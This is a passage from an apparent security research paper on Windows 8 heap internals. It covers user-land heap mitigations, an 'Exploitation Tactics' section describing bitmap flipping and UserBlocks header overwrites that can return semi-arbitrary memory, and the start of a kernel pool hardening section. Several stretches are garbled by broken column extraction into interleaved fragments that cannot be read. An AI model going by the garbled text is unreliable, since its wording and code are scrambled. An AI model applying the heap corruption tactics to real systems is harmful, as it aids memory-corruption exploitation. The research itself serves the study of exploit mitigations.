     LFH = heap‐>FrontEndHeap;   
 
    //if the LFH is activated,  it will return a valid index 
    short BucketIndex  =  RtlpGetLFHContext(LFH,  Size);  
    if(BucketIndex  != ‐1) 
    { 
     //store  the heap bucket index and update accordingly  
     Heap‐>FrontEndHeapUsageData[BlockSize]  = BucketIndex;   
     Heap‐>FrontEndHeapStatusBitmap[BitmapIndex]  |= 1 << BitPos;   
    } 
    else (BucketIndex  > 0x10) 
    { 
     //if we haven't  been using the LFH, we will next time around 
     if(!LFH) 
      Heap‐>CompatibilityFlags  |= 0x20000000;  
    } 
   } 
  } 
} 
 FrontEn d
Not only h
UserBloc k
_INTERL O
FreeEntr y
on the Fre
of the Use
Also, since
containe r
certain cir
be alloca t
overflow s
Windows  
in favor o
bit repre s
indicates 
Note : Plea
 
d	Allocatio n
have LFH ena
ks have chan g
OCK_SEQ.Hin t
yOffset to upd
eeEntryOffse t
erBlocks (Phr
e chunks wer
r (which could
rcumstances.
ted or freed n
s.  
8 directly ad
f a bitmap th
senting each c
which chunk 
ase see Fron t
n	
bling data str
ged as well. P
t to determi n
date the Hint
t which gave 
rack 68).  
re allocated in
d be adjacent
 The result w
next, enablin g
dresses both 
hat is added to
chunk in the 
from the Use
tEnd Allocati o
 
ructures chan
rior to Wind o
ne where the 
t. Unfortunat e
an attacker t
n contiguous
), sequential  
was the abilit y
g heap deter m
problems.  Fi
o the _HEAP _
UserBlocks.  T
erBlocks to us
on section ab
nged, but the 
ows 8, the Fro
next free chu
ely for Micro s
he ability to o
memory and
allocations  h
y to determin e
minism for us
rst, the FreeE
_USERDATA _
The bitmap is
se.  
ove for corre
way chunks a
ontEnd alloc a
unk resided a
soft, that rou
overwrite arb
d pointed to t
ad the poten
e which chun
se‐after‐free b
EntryOffset  h
_HEADER . The
 searched an
sponding cod
50 | Windo ware allocated
ator would re
nd then use t
tine failed to
bitrary mem o
he next free 
tial to be pre
nk within the 
bugs and seq
has been com
e newly creat
d the corres p
de. 
ws 8 Heap Inte from a 
ly on the 
the 
o do any valid
ory from the b
chunk in the 
edictable und
UserBlocks  w
uential heap 
pletely remo
ted bitmap ha
ponding index
ernals dation 
base 
er 
would 
ved 
as 1‐
x 
 

 This bring
from the W
at a rand o
variable.  
gs us to the se
Windows 7 L
om location, 
econd issues o
FH. This prob
instead of alw
of predictabl e
blem too was 
ways selectin g
e memory loc
remediated  i
g the free chu
cations being
n Windows  8
unk based off
51 | Windo wg used when m
8 by starting t
f the _INTER L
ws 8 Heap Intemaking alloc a
the bitmap se
LOCK_SEQ.Hi n
ernals ations 
earch 
nt 
 
 
52 | Windows  8 Heap Internals 
 Fast	Fail	
Linked lists are quite common for storing collections  of similar objects within the Windows  operating  
system. These same linked lists have also been the target of attackers  since the advent of heap overflow 
exploitation.  By corrupting  a linked list entry (either Flink or Blink depending  on the list type), an 
attacker can effectively  write a 4‐byte value to an arbitrary memory address. Although many checks 
have been implemented,  staring in Windows  XP SP2, there still exist link‐in and unlinking code that may 
not behave according  to security standards.   
The fast fail interrupt was designed to give application  developers  the ability to terminate  a process 
without having to know if the proper flags were designated  on heap creation. For example, if 
HeapEnableTerminationOnCorruption  is not set via the HeapSetInformation  API then an application  
might not terminate  even if an error function was called. Fail fail makes it very easy to halt the execution  
of a process by issuing a simple interrupt of int 0x29.  
You can see RtlpLowFragHeapAllocateFromZone  implements  this new interrupt when checking the 
zones to ensure the integrity of the linked list. You can search other binaries for  int 0x29 to see all of 
its usage.   
_HEAP_SUBSEGMENT  *RtlpLowFragHeapAllocateFromZone(_LFH_HEAP  *LFH, int AffinityIndex)  
{ 
  . 
  . 
  . 
 
  _LIST_ENTRY  *subseg_zones  = &LFH‐>SubSegmentZones;   
  if(LFH‐>SubSegmentZones ‐>Flink‐>Blink != subseg_zones  || 
   LFH‐>SubSegmentZones ‐>Blink‐>Flink != subseg_zones)  
   __asm {int 29}; 
 
} 
  
Note : A less comprehensive  check was used on Windows  7  	
 Guard	Pa
The LFH w
Unfortun a
sequenti a
UserBloc k
same of d
In Windo w
That mea
containin g
 
 
ages	
was designed 
ately, there e
al overflow oc
ks, then it ma
differently size
ws 7, the add
ns that a Use
g chunks of a
to be a fast, 
exist certain s
ccurs. If a chu
y also be able
ed chunks).  
ress space us
rBlock conta i
nother size (o
 
reliable way t
ituations that
unk in the LFH
e to overwrit e
sed for User B
ining chunks 
or the same s
to acquire me
t can result in
H can overflo w
e into anoth e
Blocks could p
of one size co
size).  
emory with m
n heap meta‐
w into adjac e
er UserBlock  c
potentially  res
ould reside in
53 | Windo wminimal fragm
data being ov
ent chunks wi
container (wh
side in conti g
n memory nex
ws 8 Heap Intementation. 
verwritten  if 
ithin the sam
hich may hold
guous memo r
xt to a UserB
ernals a 
e 
d the 
ry. 
locks 
 

 For exam p
reside nex
a 0x6 bloc
that lies b
chunks).  
 
 
ple, in the dia
xt to a UserB l
ck sized chun
before the con
agram below 
lock contain e
k could pote n
ntainer holdi n
 
a UserBlock  c
er hold chunk s
ntially overw r
ng the 0x40 b
container for 
s of 0x40 byt
rite the meta‐
byte chunks (a
chunks of 0x
es (0x8 block
‐data for the 
along with da
54 | Windo wx30 bytes (0x6
ks). A sequen t
_HEAP_USE R
ata inside the
ws 8 Heap Inte6 blocks) cou
tial overflow f
RDATA_HEA D
 0x8 block siz
ernals ld 
from 
DER 
zed 
 

 Windows  
by rando m
security b
of allocat i
overflow s
 
 
8 identified  t
mizing the ind
between User
ions for one s
s from corru p
the problem w
dex which se
rBlock contai n
size, a guard p
pting any data
 
with sequent
rvices an allo
ners as well. 
page will be i
a that may co
ial overflow w
cation reque
If certain heu
nserted after
me after the 
within the Us
st. Microsoft  
uristics are tri
r the UserBlo
UserBlocks.  
55 | Windo wserBlocks (to a
also identifi e
iggered, such
cks, preventi
ws 8 Heap Intea certain exte
ed the need fo
 as a large nu
ng sequentia
ernals ent) 
or 
umber 
l 
 

56 | Windows  8 Heap Internals 
 Arbitrary 	Free	
Another technique  founded by Ben Hawkes was the arbitrary freeing of chunks in the LFH by 
overwriting  the Segment Offset (Hawkes 2008). If certain flags are set, the address of the chunk header 
is adjusted to point to a new location.  
RtlFreeHeap(_HEAP  *Heap, DWORD Flags, void *Mem) 
{ 
  . 
  . 
 
  //if the header denotes  a different  segment  
  //then adjust the header accordingly  
  _HEAP_ENTRY  *Header  = Mem ‐ 8;  
  _HEAP_ENTRY  *HeaderOrig  = Mem – 8; 
  if(Header ‐>UnusedBytes  == 0x5) 
   Header ‐= 8 * Header‐>SegmentOffset;   
 
  if(!(Header ‐>UnusedBytes  & 0x3F)) 
  { 
   //this will prevent  the chunk from being freed 
   RtlpLogHeapFailure(8,  Heap, Header,  0,0,0);  
   Header = NULL; 
  } 
  . 
  . 
} 
 
In Windows  7, the newly adjusted,  and potentially  dangerous , chunk would be passed to the FrontEnd 
de‐allocator . The result would be freeing a chunk of memory that may be currently BUSY , presenting  an 
opportunity  for an attacker to change data that is currently in use by a process.  
Windows  8 has inserted checks into the intermediate  freeing routine to ensure that if a chunk has been 
adjusted it is valid chunk , as adjusted chunks should have certain characteristics . If the characteristics  
are not met, then the function will fail and return.  
 
if(HeaderOrig ‐>UnusedBytes  == 0x5) 
{ 
  //this chunk was from the LFH 
  if(Header ‐>UnusedBytes  & 0x80) 
  { 
   //ensures  that the header values haven't  been altered  
   if(!RtlpValidateLFHBlock(Heap,  Header))  
   { 
    RtlpLogHeapFailure(3,  Heap, Header,  Mem, 0, 0); 
    return 0;  
   } 
  } 
} 
 
  
57 | Windows  8 Heap Internals 
 Exception 	Handling 	
The Windows  7 LFH allocator was subject to catch‐all exception  handling when attempting  allocations . 
Essentially,  the function would catch any error , such as a memory access violation,  and return NULL, 
leaving the allocation  responsibilities  to the BackEnd allocator.   
int RtlpLowFragHeapAllocFromContext(_HEAP_BUCKET  *aHeapBucket,  int aBytes)   
{ 
  try { 
   //Attempt  allocatcion  
  } 
  catch  
  { 
   return 0; 
  } 
} 
 
I theorized  that this catch‐all behavior could actually be abused by attackers if they had the ability to 
trigger multiple overflows  (Valasek 2010). This brute forcing effect could permit attackers to bypass 
something  like ASLR due to invalid address access being handled.  
The Windows  heap team has identified  that non‐specific exception  handling may lead to security 
exposure and removed the exception  handler from RtlpLowFragHeapAllocFromContext  to prevent any 
malicious  intent.  
  
58 | Windows  8 Heap Internals 
 Exploitation 	Tactics	
This section will examine tactics that may be used against the Windows  8 heap manager to aid in code 
execution.  The Windows  8 heap manager has implemented  many anti‐exploitation  technologies,  
preventing  any of the previously  published  exploitation  techniques  affecting Windows  7 from working. 
However,  new data structures  and algorithms  have provided small opportunities  in Windows  8 to 
leverage meta‐data in a code execution  exploit.  
Bitmap	Flipping 	2.0	
We saw in the FrontEnd de‐allocation  section how the UserBlocks ‐>BusyBitmap  was used to indicate 
that a chunk managed  by the LFH is free. The bitmap was cleared at the index provided by the 
_HEAP_ENTRY.PreviousSize  member. 
int RtlpLowFragHeapFree(_HEAP  *Heap, _HEAP_ENTRY  *Header)  
{ 
  . 
  . 
  . 
  short BitmapIndex  = Header‐>PreviousSize;  
 
  //Set the chunk as free 
  Header‐>UnusedBytes  = 0x80; 
 
  bittestandreset(UserBlocks ‐>BusyBitmap ‐>Buffer,  BitmapIndex);  
 
  . 
  . 
  . 
} 
 
  
59 | Windows  8 Heap Internals 
 Also, if you remember  the _RTL_BITMAP  structure that is located off the base of the 
_HEAP_USERDATA_HEADER  (UserBlocks ). This provides a very small, but theoretical , attack surface if an 
attacker can corrupt the PreviousSize  with a value that is beyond the bitmap. For example, if a bitmap 
has a size of 0x4, but an attacker overwrites  the chunk header with a size of 0x20 then a bit will be set to 
zero in a chunk relative to the UserBlocks.  If a certain amount of information  is known about a chunk or 
chunks, it may be possible to use this tactic as a way to corrupt sensitive data.  
  
Limitations 	
While the zeroing of memory has been previously  proved to aid in the exploitation  of software 
vulnerabilities  (Moore 2008), this variation is quite limited for a few reasons.  
 The UserBlock  and corresponding  bitmap are acquired from the _HEAP_SUBSEGMENT  
 The _HEAP_SUBSEGMENT  is derived from the chunk header upon de‐allocation  
o SubSegment  = *(DWORD)header  ^ (header / 8) ^ heap ^ RtlpLFHKey;  
 Therefore,  a sequential  overflow will most likely yield an undesirable  result, terminating  the 
processes.   
 An overwrite  will need to either start after the encoded chunk header or consist of a non‐
sequential  overwrite,  such as an off‐by‐a‐few error.  
  
60 | Windows  8 Heap Internals 
 _HEAP_USERDATA_HEADER 	Attack	
The FreeEntryOffset  attack no longer works in Windows  8 due to the additional  information  added to 
the _HEAP_USERDATA_HEADER  structure that takes responsibility  for locating free chunks. But like the 
FreeEntryOffset  attack, the UserBlocks  header can also be leveraged  to give memory back to the user 
outside the address space reserved for UserBlocks.   
For example, it is possible to get multiple UserBlocks  containers  located adjacently  to each other in 
contiguous  heap memory. The following  diagram shows how a _HEAP_USERDATA_HEADER  can come 
after chunks from a different UserBlocks  container.   
 
Note : The UserBlock  containers  do NOT need to hold chunks of the same size 
 
  
+0x0000 - SubSegment
 +0x0004 - Reserved
 +0x0006 - SizeIndexPadding
 +0x000C - Signature
0x0010 -
FirstAllocationOffset
0x0012 - BlockStride
 +0x0014 – BusyBitmap
 +0x001C - BitmapData
+0x0000 - SubSegment
 +0x0004 - Reserved
 +0x0008 - SizeIndexPadding
 +0x000C - Signature
0x0010 -
FirstAllocationOffset
0x0012 - BlockStride
 +0x0014 – BusyBitmap
 +0x001C - BitmapData_HEAP_ENTRY _HEAP_ENTRY
_HEAP_ENTRY _HEAP_ENTRY
_HEAP_ENTRY _HEAP_ENTRY
_HEAP_ENTRY _HEAP_ENTRY
_HEAP_ENTRY _HEAP_ENTRY
_HEAP_ENTRY _HEAP_ENTRY_HEAP_USERDATA_HEADER
Contiguous
MemoryMemory
Chunks
 If an attac
subsequ e
Note : This
Once the 
made from
from the 
//If the 
//semi a
Header = 
  (N
Limitati o
 A
 Th
h
 Th
 Th
re
 M
af
cker can posit
ent allocation  
s is much like
FirstAllocati o
m the corrup t
FrontEnd allo
FirstAlloc
rbitrary  me
(_HEAP_ENT
NewHint * U
ons	
n overflowa b
he size of chu
ave to be kno
he chunk that
he _RTL_BIT M
esult in acces
Most importa n
fter certain h
o TIP: St
tion a _HEAP _
can point to 
e the FreeEnt r
onOffset and 
ted UserBloc
ocator.  
ationOffset  
mory will b
RY)UserBloc
serBlocks ‐>
ble chunk mus
unks contain e
own. 
t is to be retu
MAP structur e
s violations  if
ntly, allocati o
euristics are t
tagger the He
_USERDATA _
unknown  an
ryOffset attac
BlockStride  v
ks can result 
and/or the
e returned  
ks + UserBl
BlockStride
st reside in fr
ed by the ove
urned must be
e will need to
f a bitmap size
ons will need t
triggered (See
eap Bucket siz
_HEADER afte
d potentially  
ck, but limite d
values have b
in a semi‐arb
 BlockStrid
to calling  
ocks‐>First
); 
ont of a _HEA
rflowed _HEA
e FREE (!(He a
o be taken int
e is too large
to be kept to 
e FrontEnd A
zes when prim
er a chunk tha
dangerous  m
d to _HEAP_ U
been overwri
bitrary mem o
e are atta c
function,  p
Allocation O
AP_USERDA T
AP_USERDAT
ader‐>Unuse d
to account, as
. 
a minimum  a
Allocation sect
ming the heap
61 | Windo wat he can ove
memory. 
USERDATA_ H
itten, subseq
ory address be
cker contro l
potential  fo
Offset +  
TA_HEADER.  
TA_HEADER  w
dBytes & 0x3
s invalid bitm
as guard page
tion). 
p for the atta
ws 8 Heap Inteerflowed , the
HEADERs. 
uent allocati o
eing returne d
lled 
or code exec
will most likely
F))  
ap traversal c
es are introd u
ck 
ernals n a 
 
ons 
d 
c 
y 
can 
uced 

62 | Windows  8 Heap Internals 
  i.e. Alloc(0x40)  x 10; Alloc (0x50) x 0x10, etc 
User	Land	Conclusion 	
Windows  8 has changed quite a bit from its Windows  7 foundation.  We saw that new data structures  
were added to assist the memory manager with reliable allocation  and frees. These new data structures  
also advertently  changed the way certain algorithms  work. Instead of stuffing data into preexisting  
structures  to work with the current algorithms,  the newest version of Windows  created algorithms  that 
reaped the benefits of the new data structures.   
No longer are the ListHints used for a dual purpose. New dedicated  bitmaps and counters were 
introduced,  to protect the memory manager from having its meta‐data abused during an exploitation  
attempt. The algorithms  used to manage heap memory have taken out some complexities  while 
introducing  others, but still making the overall allocation  and freeing concept much easier to 
understand.   
Microsoft  has really taken security to heart with the release of Windows  8. As we’ve seen in the sections 
above, this version of Windows  probably has more mitigations  added than all other versions combined.  
It appears that all public exploitation  techniques  for Windows  7 have been addressed.  I think this shows 
that Microsoft  is listening to what security researchers  have to say and learning how to better protect 
their customers  by using available research as learning tools, instead of only seeing them as attacks on 
their operating  system.  
Lastly, we’ve seen the death of most of the heap meta‐data attacks in the Heap Manage since rise to 
popularity  starting back in the early 2000s. But are they officially dead? I think the Exploitation  Tactics 
section proves that while extremely  difficult and less abundant,  heap meta‐data exploitation  is still a 
possibility  when writing exploits for the Windows  8 operating  system.  
That being said, Windows  8 appears to have the most hardened  user‐land heap to date and will provide 
major hurdles for attackers  relying on currently exploitation  techniques.  I don’t believe the goal is to 
promise an un‐exploitable  heap manager,  but make it expensive  enough to where your average attacker 
is rendered  ineffective.   
  
63 | Windows  8 Heap Internals 
 Kernel	Pool	Allocator 	
This major section examines  the Windows  8 kernel pool allocator and highlights  the differences  between 
the implementation  in the Windows  8 Release Preview and Windows  7. Although there are no 
significant  algorithm  and structure changes since Windows  7, a number of security improvements  have 
been introduced  to address previously  presented  kernel pool attacks. We begin by providing  a brief 
overview of the kernel pool as well as its key data structures,  before moving on to detailing these 
improvements.  
Fundamentals 	
The Windows  kernel as well as third‐party drivers commonly  allocate memory from the kernel pool 
allocator.  Unlike the user‐mode heap, the kernel pool seeks to avoid costly operations  and unnecessary  
page faults as it will greatly impact the performance  of the system due to its abundant  use in all areas of 
Windows.  In order to service allocations  in the fastest and most efficient way possible, the allocator uses 
several lists from which fragments  of pool memory can be retrieved.  Knowledge  of these lists, their 
associated  data structures,  and how they are used is critical in order to understand  how the kernel pool 
operates,  and is essential in assessing  its security and robustness  against pool corruption  attacks. 
Pool	Types	
When requesting  pool memory from the pool allocator,  a driver or system component  specifies a pool 
type. Although many different types are defined, there are really only two basic types of pool memory, 
the paged pool and the non‐paged pool. 
In order to conserve resources  and memory use, the allocator allows pool memory to be paged out to 
disk. When subsequently  accessing  paged out memory, Windows  triggers a page fault, pages the data 
back into memory and recreates  the page table entry (PTE) for the specific page. However,  if the kernel 
is already running at IRQ level above DPC/Dispatch  (e.g. processing  an interrupt),  it cannot service the 
page fault interrupt in a timely manner. For this reason, the kernel also provides non‐pagable memory 
that is guaranteed  to be paged in (present) at all times. Because of this requirement,  the non‐paged pool 
is a scarce resource,  limited by the physical memory in the system.  
In a standard uniprocessor  system, Windows  sets up one (1) non‐paged pool and four (4) paged pools 
that system components  and drivers can access. These are accessed through the nt!PoolVector  and the 
nt!ExpPagedPoo lDescriptor  arrays respectively.  Note that each logged in user also has its own session 
pool, defined by the session space structure.  
Pool	Descriptor 	
In order to manage a given pool, Windows  defines what is known as the pool descriptor . The pool 
descriptor  defines the properties  of the pool itself (such as its type), but more importantly  maintains  the 
doubly linked lists of free pool chunks. Pool memory is managed  in the order of block size, a unit of 8 
bytes on 32‐bit systems and 16 bytes on 64‐bit systems. The doubly linked lists associated  with a pool 
descriptor  maintain free memory of size up to 4080/4064  (x86/x64)  bytes, hence a descriptor  holds a 
total of 512 lists on 32‐bit or 256 lists on 64‐bit. The structure of the pool descriptor  
(nt!_POOL_DESCRIPTOR ) on Windows  8 Release Preview (x64) is shown below. 
64 | Windows  8 Heap Internals 
 kd> dt nt!_POOL_DESCRIPTOR  
   +0x000 PoolType           : _POOL_TYPE  
   +0x008 PagedLock          : _FAST_MUTEX  
   +0x008 NonPagedLock      : Uint8B 
   +0x040 RunningAllocs     : Int4B 
   +0x044 RunningDeAllocs   : Int4B 
   +0x048 TotalBigPages     : Int4B 
   +0x04c ThreadsProcessingDeferrals  : Int4B 
   +0x050 TotalBytes        : Uint8B 
   +0x080 PoolIndex          : Uint4B 
   +0x0c0 TotalPages        : Int4B 
   +0x100 PendingFrees      : _SINGLE_LIST_ENTRY  
   +0x108 PendingFreeDepth  : Int4B 
   +0x140 ListHeads          : [256] _LIST_ENTRY  
 
The pool descriptor  also manages a singly‐linked list of pool chunks waiting to be freed (PendingFrees ). 
This is a performance  optimization  in order reduce the overhead  associated  with pool locking, needed 
whenever  adding or removing  elements  on a doubly linked list. If this optimization  is enabled (indicated  
by a flag in nt!ExpPoolFlags ) and a pool chunk is freed, the free algorithm  inserts it to the pending free 
lists if it’s not full (32 entries). When the list is full, the algorithm  calls a separate function 
(nt!ExDeferredFreePool ) to lock the associated  pool descriptor  and free all the pool chunks back to their 
respective  doubly‐linked free lists. 
Although not strictly related to the pool descriptor,  the kernel pool may also attempt to use lookaside  
lists for smaller sized allocations  (256 bytes or less), defined per processor  in the processor  control block 
(nt!KPRCB ). Lookaside  lists are singly linked, hence perform very well as allocations  can be serviced 
without the need to lock or operate on pool management  structures.  However,  their efficiency  comes at 
a tradeoff, as list consistency  cannot be easily validated  due to the simplistic  nature of the singly linked 
list. As such, these lists have mostly been abandoned  in user‐mode and replaced by more robust 
alternatives.  
Pool	Header	
Another important  data structure to the kernel pool, which is more relevant to memory corruption  
attack scenarios,  is the pool header. Each allocated pool chunk is preceded  by a pool header structure 
and notably defines the size of the previous and current chunk, its pool type, an index pointing to an 
array of pool descriptors,  and a pointer to the associated  process when dealing with quota charged 
allocations.  On Windows  8 Release Preview (x64), the pool header (nt!_POOL_HEADER ) is defined as 
follows. 
kd> dt nt!_POOL_HEADER  
   +0x000 PreviousSize      : Pos 0, 8 Bits 
   +0x000 PoolIndex          : Pos 8, 8 Bits 
   +0x000 BlockSize          : Pos 16, 8 Bits 
   +0x000 PoolType           : Pos 24, 8 Bits 
65 | Windows  8 Heap Internals 
    +0x000 Ulong1            : Uint4B 
   +0x004 PoolTag           : Uint4B 
   +0x008 ProcessBilled     : Ptr64 _EPROCESS  
   +0x008 AllocatorBackTraceIndex  : Uint2B 
   +0x00a PoolTagHash       : Uint2B 
 
Unlike the low fragmentation  heap in the Windows  user‐mode heap allocator,  the kernel pool divides 
pool pages into variable sized fragments  for use when servicing pool allocations.  As such, the pool 
header holds metadata  on the size of a given chunk (BlockSize ) as well as the size of the previous chunk 
(PreviousSize ) in order to allow the allocator to keep track of a chunk’s size and merge two blocks of 
free memory to reduce fragmentation.  It also holds metadata  needed to determine  whether a pool 
chunk is free (a chunk is marked as busy when its PoolType  is OR’ed with 2) and to what pool resource it 
belongs.  
The use of unprotected  metadata  preceding  pool allocations,  which is critical to both allocation  and free 
operations,  have historically  allowed for a number of different attacks. Windows  7 introduced  safe 
unlinking in the kernel pool to address the well‐known and widely discussed  “write‐4” attack . However,  
Windows  7 failed (Mandt 2011) to address several other vectors, which allowed for generic attacks by 
targeting metadata  held by pool allocations.  This included basic attacks on lookaside  lists, as well as 
various other issues such as the lack of proper pool index validation,  allowing an attacker to coerce the 
pool algorithms  to operate on a user controlled  pool descriptor.  
In Windows  8, Microsoft  has invested a significant  effort into furthermore  locking down the kernel pool. 
The following  sections aim to highlight both the improvements  and changes that were introduced  to 
both neutralize  previously  discussed  attacks as well as offer additional  hardening  to integrate better 
with state‐of‐the‐art exploit mitigation  technologies  such SMEP (SMEP). 
  
66 | Windows  8 Heap Internals 
 Windows 	8	Enhancements 	
This section details the major security enhancements  of the Windows  8 kernel pool, used to help 
mitigate previously  presented  attacks and make it more difficult for an attacker to exploit kernel pool 
corruption  vulnerabilities.  
Non‐Executable 	(NX)	Non‐Paged	Pool	
On Windows  7 and prior versions, the non‐paged pool is always backed by pages that are read, write, 
and executable  (RWX). Although DEP has allowed Microsoft  to implement  NX support on kernel memory 
pages for a long time (and has so in the paged pool case), execution  was needed in the non‐paged pool 
for a variety of reasons. The problem in maintaining  this design was that it could potentially  allow an 
attacker to store arbitrary code in kernel‐mode, and subsequently  learn its location using various 
techniques.  An example of this was described  in a 2010 HITB Magazine  article (Jurczyk) where the 
author used kernel reserve objects to store fragments  of user provided shellcode  in kernel‐mode. 
Because these objects had multiple fields controllable  by the user, and because the address of kernel 
objects could be queried from user‐mode (using NtQuerySystemInformation ), it was possible to create 
multiple objects in order to create a full‐fledged shellcode.  Windows  8 attempts to address injection of 
user control code into RWX memory and make it less useful to jump into the non‐paged pool by 
introducing  the Non‐Executable  (NX) non‐paged pool. 
It is fair to ask why Microsoft  didn’t choose to introduce  the non‐executable  non‐paged pool at an 
earlier stage. One fairly apparent answer is that there was no need to. Rather than going through the 
trouble of inserting shellcode  into kernel memory (and possibly having to find its location),  the attacker 
could simply put the shellcode  in an executable  buffer in user‐mode, direct execution  there, and call it a 
day. While this works perfectly well on Windows  7 and prior versions of the operating  system, Windows  
8 takes advantage  of the new hardware  mitigation  introduced  in Intel Ivy Bridge CPUs called Supervisor  
Mode Execution  Protection  (SMEP). In short, SMEP (or “OS Guard”, which appears to be the marketing  
name) prevents the CPU, while running in privileged  mode, from executing  pages marked as “User” 
(indicated  by the PTE), and thus effectively  hinders execution  of user‐mode pages. The reason the non‐
executable  non‐paged pool made its appearance  now is therefore  more likely because SMEP could easily 
be bypassed  if all non‐paged memory was executable.  
The NX non‐paged pool is introduced  as a new pool type (0x200), hence requires existing code to be 
updated for compatibility  reasons. The POOL_TYPE  enum in Windows  8 now contains the following  
definitions.  
kd> dt nt!_POOL_TYPE  
   NonPagedPool  = 0n0 
   NonPagedPoolExecute  = 0n0 
   PagedPool  = 0n1 
   NonPagedPoolMustSucceed  = 0n2 
   DontUseThisType  = 0n3 
   NonPagedPoolCacheAligned  = 0n4 
   PagedPoolCacheAligned  = 0n5 
   NonPagedPoolCacheAlignedMustS  = 0n6 
67 | Windows  8 Heap Internals 
    MaxPoolType  = 0n7 
   NonPagedPoolBase  = 0n0 
   NonPagedPoolBaseMustSucceed  = 0n2 
   NonPagedPoolBaseCacheAligned  = 0n4 
   NonPagedPoolBaseCacheAlignedMustS  = 0n6 
   NonPagedPoolSession  = 0n32 
   PagedPoolSession  = 0n33 
   NonPagedPoolMustSucceedSession  = 0n34 
   DontUseThisTypeSession  = 0n35 
   NonPagedPoolCacheAlignedSession  = 0n36 
   PagedPoolCacheAlignedSession  = 0n37 
   NonPagedPoolCacheAlignedMustSSession  = 0n38 
   NonPagedPoolNx  = 0n512 
   NonPagedPoolNxCacheAligned  = 0n516 
   NonPagedPoolSessionNx  = 0n544 
 
Most non‐paged pool allocations  in both the Windows  kernel and system drivers such as win32k.sys  
now use the NX pool type for non‐paged allocations.  This also includes kernel objects such as the 
reserve object mentioned  initially. Naturally,  the NX pool is only relevant as long as DEP is enabled by 
the system. If DEP is disabled, the kernel sets the 0x800 bit in nt!ExpPoolFlags  to inform the pool 
allocator that the NX non‐paged pool should not be used. 
Windows  8 creates two pool descriptors  per non‐paged pool, defining both executable  and non‐
executable  pool memory. This can be observed  by looking at the function responsible  for creating the 
non‐paged pool, nt!InitializePool . 
POOL_DESCRIPTOR  * Descriptor;  
 
// check if the system has multiple  NUMA nodes 
if ( KeNumberNodes  > 1 ) 
{ 
     ExpNumberOfNonPagedPools  = KeNumberNodes;  
 
     // limit by pool index maximum  
     if ( ExpNumberOfNonPagedPools  > 127 )  
     { 
         ExpNumberOfNonPagedPools  = 127; 
     } 
 
     // limit by pointer  array maximum  
     // x86: 16; x64: 64 
     if ( ExpNumberOfNonPagedPools  > EXP_MAXIMUM_POOL_NODES  )  
     { 
         ExpNumberOfNonPagedPools  = EXP_MAXIMUM_POOL_NODES;  
     } 
 
     // create two non‐paged pools per NUMA node 
     for ( idx = 0; idx < ExpNumberOfNonPagedPools;  idx++ ) 
     { 
         Descriptor  = MmAllocateIndependentPages(  sizeof(POOL_DESCRIPTOR)  * 2 ); 
68 | Windows  8 Heap Internals 
      
         if ( !Descriptor  ) 
             return 0; 
     
         ExpNonPagedPoolDescriptor[idx]  = Descriptor;  
         ExInitializePoolDescriptor(idx,  Descriptor,  NonPagedPoolNx);  
         ExInitializePoolDescriptor(idx,  Descriptor  + 1, 0); 
     } 
} 
 
// initialize  the default  non‐paged pool descriptors  
ExpTaggedPoolLock  = 0; 
PoolVector  = &NonPagedPoolDescriptor;  
ExInitializePoolDescriptor(  0, &NonPagedPoolDescriptor,  NonPagedPoolNx  ); 
ExInitializePoolDescriptor(  0, &unk_5D9740,  NonPagedPool  ); 
 
 
The non‐executable  and executable  pool descriptors  are located adjacently  in memory, hence the kernel 
only needs to adjust the pointer by the size of a descriptor  in order to switch between the two. For 
NUMA compatible  systems with multiple nodes, nt!ExpNonPagedPoolDescriptor  points to individual  
pairs of descriptors,  whereas on uniprocessor  (non‐NUMA) systems, the first entry in nt!PoolVector  
points to the pair of non‐paged pool descriptors  located in the data section of the kernel image. 
Additionally,  Windows  8 also defines lookaside  lists for the NX non‐paged pool. These are managed  by 
the processor  control block (nt!_KPRCB ), where specifically  PPNxPagedLookasideList  defines the array 
of NX lookaside  lists. 
kd> dt nt!_KPRCB  
... 
   +0x670 LockQueue          : [17] _KSPIN_LOCK_QUEUE  
   +0x780 PPLookasideList   : [16] _PP_LOOKASIDE_LIST  
   +0x880 PPNxPagedLookasideList  : [32] _GENERAL_LOOKASIDE_POOL  
   +0x1480 PPNPagedLookasideList  : [32] _GENERAL_LOOKASIDE_POOL  
   +0x2080 PPPagedLookasideList  : [32] _GENERAL_LOOKASIDE_POOL  
   +0x2c80 PrcbPad20          : Uint8B 
 
In order to distinguish  between executable  and non‐executable  non‐paged pool allocations,  the pool 
allocator does not trust the pool type in the pool header. This could potentially  allow an attacker, using 
a pool corruption  vulnerability,  to inject pool chunks present in executable  memory into lists managing  
non‐executable  memory. Instead, the kernel calls nt!MmIsNonPagedPoolNx  to determine  if a chunk is 
non‐executable.  This function looks up the page table entry (PTE) or the page directory entry (PDE) and 
checks the NX bit (0x8000000000000000)  as shown below. 
BOOL 
MmIsNonPagedPoolNx(  ULONG_PTR  va ) 
{ 
     PMMPTE pte,pde;  
 
     if ( MmPaeMask  == 0 ) 
69 | Windows  8 Heap Internals 
          return TRUE; 
 
     pde = MiGetPdeAddress(  va ); 
 
     // check no‐execute  bit in page directory  entry (large page) 
     if ( pde‐>u.Hard.NoExecute  ) 
         return TRUE; 
    
     pte = MiGetPteAddress(  va ); 
 
     // check no‐execute  bit in page table entry 
     if ( pte‐>u.Hard.NoExecute  ) 
         return TRUE; 
 
     return FALSE; 
} 
 
 
Kernel	Pool	Cookie	
One of the ways attacks against pool metadata  are mitigated  in Windows  8 is by introducing  
unpredictable  data into select locations such that exploitation  attempts can be detected at the earliest 
opportunity.  This random piece of data is known as the kernel pool cookie and is essentially  a 
randomized  value (combined  with various other properties  such as the address of the structure it seeks 
to protect) chosen at runtime by the operating  system. Cookies are already used by the kernel in 
protecting  against stack‐based buffer overruns,  and have for many years played an important  role in 
mitigating  exploitation  in user‐mode. As long as the attacker cannot infer the value of the kernel pool 
cookie, the system may detect exploitation  attempts in scenarios  where behavior in either allocation  or 
free algorithms  are attempted  abused. 
As the security of the kernel pool cookie lies in its secrecy, it’s important  to understand  how the cookie 
is generated.  We discuss the seeding of the cookie as well as how it is generated  in the following  
sections. 
Gathering 	Boot	Entropy	
The way in which the pool cookie is created starts at boot time when the Windows  loader (Winload)  
collects entropy, later used for seeding the kernel provided pseudo random number generator  (exposed 
through nt!ExGenRandom ). This entropy is passed to the kernel through the loader parameter  block 
(nt!KeLoaderBlock ), which is initialized  in winload!OslInitializeLoaderBlock  upon running the Windows  
loader. The loader block initialization  function sets up various device nodes including the disk and 
keyboard  controller,  before calling winload!OslGatherEntropy  to gather the boot entropy itself. 
The boot entropy gathered by Winload is primarily retrieved from six different sources. These sources 
